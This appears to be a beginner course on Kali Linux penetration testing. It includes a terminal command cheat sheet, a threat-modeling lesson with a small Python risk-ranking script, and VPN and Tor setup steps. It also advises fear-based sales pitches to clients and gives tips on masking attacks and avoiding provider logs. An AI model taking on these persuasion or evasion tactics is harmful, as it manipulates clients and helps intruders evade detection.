Lesson 1: Introduction to Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp Suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer's hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.

Introduction to Kali Linux (from the Kali website): Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.

Kali Linux Features

Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.

More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality.

Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux.

Open source Git tree: We are huge proponents of open source software and our development tree is available for all to see, and all sources are available for those who wish to tweak and rebuild packages.

FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc.

Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.

Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments, so our kernel has the latest injection patches included.

Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols.

GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed, and the repositories subsequently sign the packages as well.

Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.

Completely customizable:

ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali's ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution, so tools for ARM will be updated in conjunction with the rest of the distribution. Kali is currently available for the following ARM devices:
- rk3306 mk/ss808
- Raspberry Pi
- ODROID U2/X2
- Samsung Chromebook
- EfikaMX
- Beaglebone Black
- CuBox
- Galaxy Note 10.1
..................
Okay class, it's important to realize that most of the tools in Kali are launched from the GUI (graphical user interface), unlike previous installations of BackTrack, which required terminal input. The terminal is like the Windows command prompt, with one difference you will quickly notice: Windows file paths use the backslash \ while Linux file paths use the forward slash /.

***Important*** File paths are case sensitive, and when launching a program you also have to type the extension. Ex. Root/user/admin/torhammer.py. If you had the above program installed, typing the extension ".py" as part of the name is what launches the program.

Another cool thing about Kali, and Linux in general, is that once you learn a programming language, you can write your own programs in its "notepad"-style editor and save the file as something like "hacklikeaboss.py"; it is saved as a Python file. Then right-click it, change the advanced settings to mark it as an executable file, and voila! Your very own custom program has been created.

Enough about Kali, I'm sure you're ready to get started on lesson 2.

Lesson 2: Real World applications for Kali, forming your own business, and introduction to terminal, the hacker's best friend.

Lesson 2: Real World Applications for Kali Linux

Greetings class: Real world applications for Kali Linux are very diverse. Incorporating them into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company.

Small business examples: Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work from home. These are the businesses you will start with at first to build a reputation. Stressing the importance of data security to the customer is an integral part of the sales pitch. Looking up articles about local businesses around your area, and even college databases, being breached can not only raise awareness but also raise the fear factor. Ever heard the term "a little fear is healthy"?

Well, fear sells, and in today's day and age everyone is digital. Some people run their business sites via WordPress, and even blog on them daily about events. This consumes a good portion of the client's time, and if someone were to gain access because of a faulty line of code in the site, they could not only lose their investment but lose customers and customer data as well. A Kali Linux application for this would be a tool called wpscan, which we will review later on; it scans the site for vulnerabilities, allowing you to report them to the sitemaster or admin. It's illegal to scan without permission; always get permission.

Another tool to use would be nmap. This tool scans for open ports on Wi-Fi connections. Open ports are like open doors that anyone with the right knowledge can walk through and reach things like customer data, and even credit card transaction information.

You will find when launching these programs via the drop-down menu that they open a sort of command prompt via a program called terminal. Kali is already preconfigured to run with root access, so a tutorial on sudo isn't necessary. Terminal accepts your commands and runs basically every function on Kali, and this is where you will spend most of your time.
Every time you start Kali, if it's a live disk and not a full install, I recommend opening up a terminal first thing. Then type apt-get update; this refreshes the package lists. You can also upgrade the installed software with apt-get upgrade. Other commands are listed below.

System Info
date – Show the current date and time
cal – Show this month's calendar
uptime – Show current uptime
w – Display who is online
whoami – Who you are logged in as
finger user – Display information about user
uname -a – Show kernel information
cat /proc/cpuinfo – CPU information
cat /proc/meminfo – Memory information
df -h – Show disk usage
du – Show directory space usage
free – Show memory and swap usage

Keyboard Shortcuts
Enter – Run the command
Up Arrow – Show the previous command
Ctrl + R – Allows you to type a part of the command you're looking for and finds it
Ctrl + Z – Stops the current command; resume with fg in the foreground or bg in the background
Ctrl + C – Halts the current command, cancels the current operation and/or starts with a fresh new line
Ctrl + L – Clear the screen
command | less – Allows the scrolling of the bash command window using Shift + Up Arrow and Shift + Down Arrow
!! – Repeats the last command
!$ – Repeats the last argument of the previous command
Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it before executing the command
Ctrl + A – Return to the start of the command you're typing
Ctrl + E – Go to the end of the command you're typing
Ctrl + U – Cut everything before the cursor to a special clipboard; erases the whole line
Ctrl + K – Cut everything after the cursor to a special clipboard
Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to
Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right, try it!)
Ctrl + W – Delete the word / argument left of the cursor in the current line
Ctrl + D – Log out of current session, similar to exit

Learn the Commands
apropos subject – List manual pages for subject
man -k keyword – Display man pages containing keyword
man command – Show the manual for command
man -t man | ps2pdf - > man.pdf – Make a PDF of a manual page
which command – Show full path name of command
time command – See how long a command takes
whereis app – Show possible locations of app
which app – Show which app will be run by default; it shows the full path

Searching
grep pattern files – Search for pattern in files
grep -r pattern dir – Search recursively for pattern in dir
command | grep pattern – Search for pattern in the output of command
locate file – Find all instances of file
find / -name filename – Starting with the root directory, look for the file called filename
find / -name "*filename*" – Starting with the root directory, look for files whose names contain the string filename
locate filename – Find a file called filename using the locate command; this assumes you have already used the command updatedb (see next)
updatedb – Create or update the database of files on all file systems attached to the Linux root directory
which filename – Show the subdirectory containing the executable file called filename
grep -r TextStringToFind /dir – Starting with the directory called dir, look for and list all files containing TextStringToFind (the -r makes grep descend into subdirectories)

File Permissions
chmod octal file – Change the permissions of file to octal, which can be found separately for user, group, and world by adding: 4 – read (r), 2 – write (w), 1 – execute (x)
Examples:
chmod 777 file – read, write, execute for all
chmod 755 file – rwx for owner, rx for group and world
For more options, see man chmod.

File Commands
ls – Directory listing
ls -l – List files in current directory using long format
ls -laC – List all files in current directory in long format and display in columns
ls -F – List files in current directory and indicate the file type
ls -al – Formatted listing with hidden files
cd dir – Change directory to dir
cd – Change to home
mkdir dir – Create a directory dir
pwd – Show current directory
rm name – Remove a file or directory called name
rm -r dir – Delete directory dir
rm -f file – Force remove file
rm -rf dir – Force remove an entire directory dir and all its included files and subdirectories (use with extreme caution)
cp file1 file2 – Copy file1 to file2
cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist
cp file /home/dirname – Copy the file called file to the /home/dirname directory
mv file /home/dirname – Move the file called file to the /home/dirname directory
mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2
ln -s file link – Create symbolic link link to file
touch file – Create or update file
cat > file – Places standard input into file
cat file – Display the file called file
more file – Display the file called file one page at a time; proceed to the next page using the spacebar
head file – Output the first 10 lines of file
head -20 file – Display the first 20 lines of the file called file
tail file – Output the last 10 lines of file
tail -20 file – Display the last 20 lines of the file called file
tail -f file – Output the contents of file as it grows, starting with the last 10 lines

Compression
tar cf file.tar files – Create a tar named file.tar containing files
tar xf file.tar – Extract the files from file.tar
tar czf file.tar.gz files – Create a tar with Gzip compression
tar xzf file.tar.gz – Extract a tar using Gzip
tar cjf file.tar.bz2 files – Create a tar with Bzip2 compression
tar xjf file.tar.bz2 – Extract a tar using Bzip2
gzip file – Compresses file and renames it to file.gz
gzip -d file.gz – Decompresses file.gz back to file

Printing
/etc/rc.d/init.d/lpd start – Start the print daemon
/etc/rc.d/init.d/lpd stop – Stop the print daemon
/etc/rc.d/init.d/lpd status – Display status of the print daemon
lpq – Display jobs in print queue
lprm – Remove jobs from queue
lpr – Print a file
lpc – Printer control tool
man subject | lpr – Print the manual page called subject as plain text
man -t subject | lpr – Print the manual page called subject as PostScript output
printtool – Start X printer setup interface

Network
ifconfig – List IP addresses for all devices on the local machine
iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency)
iwlist – Used to display some additional information from a wireless network interface that is not displayed by iwconfig
ping host – Ping host and output results
whois domain – Get whois information for domain
dig domain – Get DNS information for domain
dig -x host – Reverse lookup host
wget file – Download file
wget -c file – Continue a stopped download

SSH
ssh user@host – Connect to host as user
ssh -p port user@host – Connect to host on port port as user
ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login

User Administration
adduser accountname – Create a new user called accountname
passwd accountname – Give accountname a new password
su – Log in as superuser from current login
exit – Stop being superuser and revert to normal user

Process Management
ps – Display your currently active processes
top – Display all running processes
kill pid – Kill process id pid
killall proc – Kill all processes named proc (use with extreme caution)
bg – Lists stopped or background jobs; resume a stopped job in the background
fg – Brings the most recent job to foreground
fg n – Brings job n to the foreground

Installation from source
./configure
make
make install
dpkg -i pkg.deb – Install a DEB package (Debian / Ubuntu / Linux Mint)
rpm -Uvh pkg.rpm – Install an RPM package (Red Hat / Fedora)

Stopping & Starting
shutdown -h now – Shut down the system now and do not reboot
halt – Stop all processes; same as above
shutdown -r 5 – Shut down the system in 5 minutes and reboot
shutdown -r now – Shut down the system now and reboot
reboot – Stop all processes and then reboot; same as above
startx – Start the X system

Lesson 3: Threat assessment and how to sell it

Good morning class, I hope you have had time to experiment with terminal commands and familiarize yourselves with the file structure of Kali Linux. Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson will be on threat assessment.

Now for a little roleplay. Company XYZ is a Fortune 500 company that buys and trades domains on the market, processes credit cards and bank transactions, stores customer information on encrypted servers, and has an option for member sign-up. You ask them and they say they are running SQL databases. How would you approach the company to sell your business? Respond to this email with your answer. My answer will be included in lesson 4.

Now on to threat assessment: Modeling

There is no single solution for keeping yourself safe online. Digital security isn't about which tools you use; rather, it's about understanding the threats you face and how you can counter those threats. To become more secure, you must determine what you need to protect, and whom you need to protect it from. Threats can change depending on where you're located, what you're doing, and whom you're working with. Therefore, in order to determine what solutions will be best for you, you should conduct a threat modeling assessment.
When conducting an assessment, there are five main questions you should ask yourself:

What do you want to protect?
Who do you want to protect it from?
How likely is it that you will need to protect it?
How bad are the consequences if you fail?
How much trouble are you willing to go through in order to try to prevent those?

When we talk about the first question, we often refer to assets, or the things that you are trying to protect. An asset is something you value and want to protect. When we are talking about digital security, the assets in question are usually information. For example, your emails, contact lists, instant messages, and files are all assets. Your devices are also assets. Write down a list of data that you keep, where it's kept, who has access to it, and what stops others from accessing it.

In order to answer the second question, "Who do you want to protect it from," it's important to understand who might want to target you or your information, or who is your adversary. An adversary is any person or entity that poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government, or a hacker on a public network. Make a list of who might want to get ahold of your data or communications. It might be an individual, a government agency, or a corporation.

A threat is something bad that can happen to an asset. There are numerous ways that an adversary can threaten your data. For example, an adversary can read your private communications as they pass through the network, or they can delete or corrupt your data. An adversary could also disable your access to your own data. The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a video showing police violence may be content to simply delete or reduce the availability of that video, whereas a political opponent may wish to gain access to secret content and publish it without you knowing.

Write down what your adversary might want to do with your private data. The capability of your attacker is also an important thing to think about. For example, your mobile phone provider has access to all of your phone records and therefore has the capability to use that data against you. A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might have stronger capabilities.

A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to access all of your data, the risk of them posting your private data online to harm your reputation is low. It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where they are not).

Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high risks because they don't view the threat as a problem. In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to be available than confidential.

Now, let's practice threat modeling.
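The five questions and the asset / adversary / capability / threat / risk distinctions above, encoded as a small ranking script. This is an added worked example, not part of the original lesson; the adversaries are the lesson's own (mobile phone provider, hacker on an open Wi-Fi network, government), and every score, capability label and threshold is a constructed assumption.

```python
"""Five-question threat model from the lesson, as runnable code.

Added worked example, not part of the original lesson. Uses the lesson's
own adversaries; every score and capability label below is a constructed
illustrative value, and the effort thresholds are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Asset:
    name: str
    consequence: int         # 1..5: "How bad are the consequences if you fail?"


@dataclass(frozen=True)
class Adversary:
    name: str
    capabilities: frozenset  # what this adversary can actually do


@dataclass(frozen=True)
class Threat:
    description: str         # "something bad that can happen to an asset"
    asset: Asset
    adversary: Adversary
    needs: str               # capability the adversary must have to carry it out
    likelihood: int          # 0..5: "How likely is it that you will need to protect it?"
    unacceptable: bool = False  # a threat you refuse to accept at any likelihood


def is_feasible(threat: Threat) -> bool:
    """A threat is only a risk if the adversary has the capability it needs."""
    return threat.needs in threat.adversary.capabilities


def risk_score(threat: Threat) -> int:
    """Risk = likelihood the threat occurs, weighted by consequence (0..25)."""
    if not is_feasible(threat):
        return 0
    return threat.likelihood * threat.asset.consequence


def recommended_effort(threat: Threat) -> str:
    """'How much trouble are you willing to go through?' Mirrors the lesson's
    lock example: low risk, don't over-invest; high risk, best protection."""
    if not is_feasible(threat):
        return "none"
    if threat.unacceptable:
        return "maximum"
    score = risk_score(threat)
    if score <= 5:
        return "low"
    if score <= 12:
        return "moderate"
    return "high"


def prioritize(threats):
    """Rank threats: unacceptable-and-feasible first, then by risk score."""
    ranked = sorted(
        threats,
        key=lambda t: (is_feasible(t) and t.unacceptable, risk_score(t)),
        reverse=True,
    )
    return [(t.description, risk_score(t), recommended_effort(t)) for t in ranked]


# Constructed sample model built from the lesson's examples.
LOGINS = Asset("web logins and session cookies", consequence=4)
CALL_RECORDS = Asset("phone records (who I called and when)", consequence=3)

WIFI_HACKER = Adversary("hacker on an open Wi-Fi network",
                        frozenset({"read unencrypted traffic"}))
PROVIDER = Adversary("mobile phone provider", frozenset({"read phone records"}))
GOVERNMENT = Adversary("government", frozenset(
    {"read phone records", "read unencrypted traffic", "compel disclosure"}))

SAMPLE_THREATS = [
    Threat("coffee-shop attacker reads my unencrypted logins",
           LOGINS, WIFI_HACKER, "read unencrypted traffic", likelihood=4),
    Threat("provider posts my call records online to embarrass me",
           CALL_RECORDS, PROVIDER, "read phone records", likelihood=1),
    Threat("Wi-Fi attacker obtains my call records",
           CALL_RECORDS, WIFI_HACKER, "read phone records", likelihood=3),
    Threat("government compels my provider to hand over call records",
           CALL_RECORDS, GOVERNMENT, "compel disclosure", likelihood=2,
           unacceptable=True),
]

if __name__ == "__main__":
    for description, score, effort in prioritize(SAMPLE_THREATS):
        print(f"{score:>2}  {effort:<8}  {description}")
```

The third threat scores zero because the Wi-Fi attacker lacks the capability it needs: a threat, but not a risk, which is exactly the distinction the lesson draws.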
If you want to keep your house and possessions safe, here are a few questions you might ask:

Should I lock my door?
What kind of lock or locks should I invest in?
Do I need a more advanced security system?
What are the assets in this scenario? The privacy of my home; the items inside my home.
What is the threat? Someone could break in.
What is the actual risk of someone breaking in? Is it likely?

Once you have asked yourself these questions, you are in a position to assess what measures to take. If your possessions are valuable, but the risk of a break-in is low, then you probably won't want to invest too much money in a lock. On the other hand, if the risk is high, you'll want to get the best locks on the market, and perhaps even add a security system.

Lesson 4: Opsec, VPN, Tor.

Opsec stands for "operational security" and is a term coined by the special forces in the United States military. When it comes to hacking, Opsec is essential so as not to let your opponent know that you are on to them. If you are hired to test the security already in place, it is obvious that you will need to learn ways to mask your attacks.

Virtual Private Networks or VPNs: What Is A VPN?

A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the Internet) to a remote network/location. This remote network is typically a private network, such as a workplace or home network, or one provided by a commercial VPN service. A VPN can be thought of as creating a "tunnel" through the public network to your private network at the other end. All network traffic through this tunnel is encrypted to ensure it is kept secure and private.

What Does A VPN Let Me Do?

A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard network. This includes:

Network Security & Privacy: All network traffic through your VPN connection is kept secure.
This allows you to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network traffic, such as seeing what you are viewing, stealing your information and login details, etc.

Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you were physically in the office. You can then do things like access file servers, computers, databases, email, internal webpages, and other services you might not have access to outside of your work network.

Access Your Home Network: Connecting back home using a VPN allows you to access your computers remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and access other services.

Access Location Restricted Content: By connecting to a VPN server in another location you can make it appear to websites using geolocation that you are physically in the correct location for access. So when you're travelling overseas you can still view websites you would normally use at home, such as television, movie and music streaming websites.

Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed, meaning that many applications like VoIP, instant messaging, video chat, and games will not work. However, using a VPN you can tunnel through such restrictions and allow all of your network applications to work. Viscosity even allows you to tunnel through HTTP or SOCKS proxies to establish your VPN connection.

Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a VPN provides a way to still maintain access to the services you would normally use.

Why Should I Use A VPN?

Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the security and privacy of your network traffic. Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing, steal usernames and passwords, steal session information to be able to log into sites as you, and extract other private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only monitor your network traffic in depth, but also alter your traffic or inject their own in an attempt to fool a user into revealing important data. Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it secure and private.

How Does A VPN Work?

A typical VPN consists of two components: the VPN client and the VPN server. A VPN client is the software that allows a user to connect their computer to the VPN server and establish the VPN connection. It is installed on the user's computer and communicates with the VPN server to create a secure link for the user's network traffic. The VPN client is what the end user uses to control their VPN connection. Viscosity performs the duties of a VPN client.

A VPN server is set up at the location users want to connect to, such as at a workplace or at home. A VPN server is usually configured and maintained by IT staff; however, home users often set up their own personal VPN server at home or at a remote location as well. End users rarely have to interact with the VPN server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN. All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it private and secure.

What Is OpenVPN?

OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption.
Like IPSec and PPTP, OpenVPN handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to its high level of security, customizability, and compatibility with most network environments.

VPN Service Providers

There are many companies that specialize in providing a commercial VPN service. These companies are known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing you to not only get the security and privacy benefits of a VPN, but also making it easy to access websites that restrict access to certain countries. Most VPN Service Providers charge a small monthly or yearly fee for access to their servers; however, there are also a number of free service providers.

The key to choosing a quality VPN comes down to two factors: 1) do they cooperate with United States government subpoenas, and 2) do they keep logs (you don't want logs).

TorGuard

TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the ability to connect to torrent-friendly services if you need to download something, encryption- and anonymity-friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous proxy or a torrent proxy.

Their full VPN service, however, features over 200 exit servers in 18 countries, no logging or data retention of any kind, and their network is set up in a way that they actually have no information to collect on their user activities—they don't know what you're doing or when you're connected. They delivered a really great response to Torrentfreak's questions that's well worth a read for more info. They also support multiple connectivity protocols, support virtually every desktop and mobile OS, and even offer their customers encrypted, offshore email service if you want to take advantage. Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies"). You also noted that they support OpenVPN, help you get connected via your home network, and have great customer service.

IPVanish VPN

IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're compromising security though—they have over 14,0000 IPs to share on over a hundred exit servers in 47 different countries. You can choose where you'd prefer to connect, which again is perfect for getting around location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X, Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and Android, and they offer configuration utilities so you can set your home router to connect to them as well. They feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish are $10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols).

IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that they're happy with you streaming video or music while you're connected to get around pesky content blocks, especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back home or make use of their streaming music subscription.

CyberGhost VPN

CyberGhost has been around for a long time, and they made a great showing in the call for contenders thread. Like any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection and anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the go, you may be able to get away with a free account. The service just went through a massive overhaul about a year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different countries (free users can pick from one of 14, still impressive for a free service), and you can see server status at any time. Their clients are easy to use, support virtually every mobile and desktop platform, and they don't discriminate against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to get around their location-blocks).
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 hours, and are limited to the official client, while pro accounts can use other connection protoctols and have way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if you need more than one device connected at any given time, you'll need to step up to Premium Plus, at $11/mo and $70/yr. Those of you who praised the service noted their great connection speeds, wealth of servers to choose from (even for free users). Read more in the nomination thread here. Do-It-Yourself Of course, no list of great options would be complete with the DIY approach. If you don't need exit servers in different countries, and your primary need is to encrypt and secure your data when you're away from home, you can roll yout own VPN with OpenVPN or a number of other free, open-source tools. Many of the best routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is that you get to set the level of encryption, you get complete control over who connects and who has access to what parts of your home network, and where your data goes from there. Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their VPN running there while they connect to it when necessary. The sky's the limit with the DIY option, it just takes the skill and knowhow to do it, and some compromise on the level of features and tools you get. 
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are the great people over at Tunnelbear, who are constantly working to improve and update their service to help you get around regional restrictions and blocks, and who recently unveiled a browser add-on to tunnel some services but not others, giving you even more control over your connection. We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly need. You can forward remote ports, pick and choose exit servers in multiple countries, and even generate an OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to externally, they're worth a look.

We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least they log user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days.
That's not an issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011 on the topic, cagey with me when I last spoke to a rep from the company, and this Reddit thread is rather illuminating as well. Still, there are signs that things may be changing with VyprVPN. The feature set and the face of the company both look good, and they combine Usenet with VPN services, which is great, but we don't feel comfortable calling them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of your data.

A final note—something we mentioned when we talked—don't fall into the geography trap, assuming that an overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who asks—and there are definitely VPN providers that fall in both categories.

Tor Browser Bundle 4.0.4

Tor, a privacy-oriented encrypted anonymizing service, has announced the launch of the next version of its Tor Browser Bundle, i.e. Tor Browser Bundle 4.0.4, mostly intended to improve the built-in utilities and the privacy and security of online users. Tor Browser helps users browse the Internet in a completely anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox, configured to protect the users' anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere.
NEW FEATURES

The latest version, Tor Browser Bundle 4.0.4, has recently been released with a small number of new features:

- Updated Firefox to 31.5.0esr with important security updates
- Updated OpenSSL to 1.0.1l
- Updated NoScript to 2.6.9.15
- Updated HTTPS-Everywhere to 4.0.3

BUG FIXES

Meanwhile, the new Tor Browser Bundle 4.0.4 also includes some bug fixes:

- Bug 14203: Prevent meek from displaying an extra update notification
- Bug 14849: Remove new NoScript menu option to make permissions permanent
- Bug 14851: Set NoScript pref to disable permanent permissions

"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team. Tor is generally thought of as a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy-oriented services, and it is mostly used by activists and journalists to circumvent online censorship and surveillance efforts by various countries. However, late last year we saw a large-scale cyber attack on the Tor network that quietly seized some of its specialized network servers called Directory Authorities (DA), the servers that help Tor clients find Tor relays in the anonymous network. On the other side, last month 12 high-capacity Tor middle relays were launched by Polaris, a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology, in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce the strain caused by the finite number of Tor connections occurring at the same time.

Installing Tor in Kali Linux

Step 1: Getting the tor service ready

There are 3 ways of installing the Tor service in Kali Linux.
You can install Tor by following any of these options:

Option #1: Install Tor from the Kali repository

Tor is available in the Kali repository. To install it directly from the repository, open your terminal and type:

apt-get install tor

If no error occurs, continue with Step 2 (downloading and running the Tor Browser Bundle).

Option #2: Install Tor from the Debian Wheezy repository

If you can't install Tor using the first method, then you may try this option. Here we are going to add the official Tor repository according to our Debian distribution. Not to be confused: Kali is actually based on Debian and uses the package management from "Wheezy", so we are going to use "Wheezy" as our distribution. Now open your terminal and follow these steps:

Step #1: Add the repo to the sources.list file

Let's add the distribution to the list by opening the sources.list file:

leafpad /etc/apt/sources.list

Now add the following line at the bottom of the file:

deb http://deb.torproject.org/torproject.org wheezy main

Step #2: Add GPG keys

Now we need to add the GPG key used to sign the packages by running the following commands:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -

(886DDD89 is only the short key ID, which several keys can share; the export uses the full 40-character fingerprint, and that fingerprint is the value to compare against the one published by the Tor Project before trusting the key.)

Step #3: Update package lists

Let's refresh our sources:

apt-get update

Step #4: Install the signing keys

Now, before installing Tor, we must add the signing keyring:

apt-get install deb.torproject.org-keyring

Step #5: Install Tor from the Debian repository

Finally:

apt-get install tor

Now Tor should be installed! If no error occurs, continue with Step 2.

Option #3: Install Tor from the development branch

If you are an advanced user and you want to install Tor using the development branch, then this method is for you.
Step #1: Add the Tor project repository to sources.list

You need to add a different set of lines to your /etc/apt/sources.list file:

deb http://deb.torproject.org/torproject.org wheezy main
deb http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main

Step #2: Add GPG keys and the keyring, and install Tor

Then run the following commands at your command prompt:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
apt-get update
apt-get install tor deb.torproject.org-keyring

Now Tor should be installed! If no error occurs, continue with Step 2.

Note: This release will provide you with more features, but it contains bugs too.

Option #4: Build and install Tor from source

If you want to build your own debs from source, you must first add an appropriate deb-src line to sources.list:

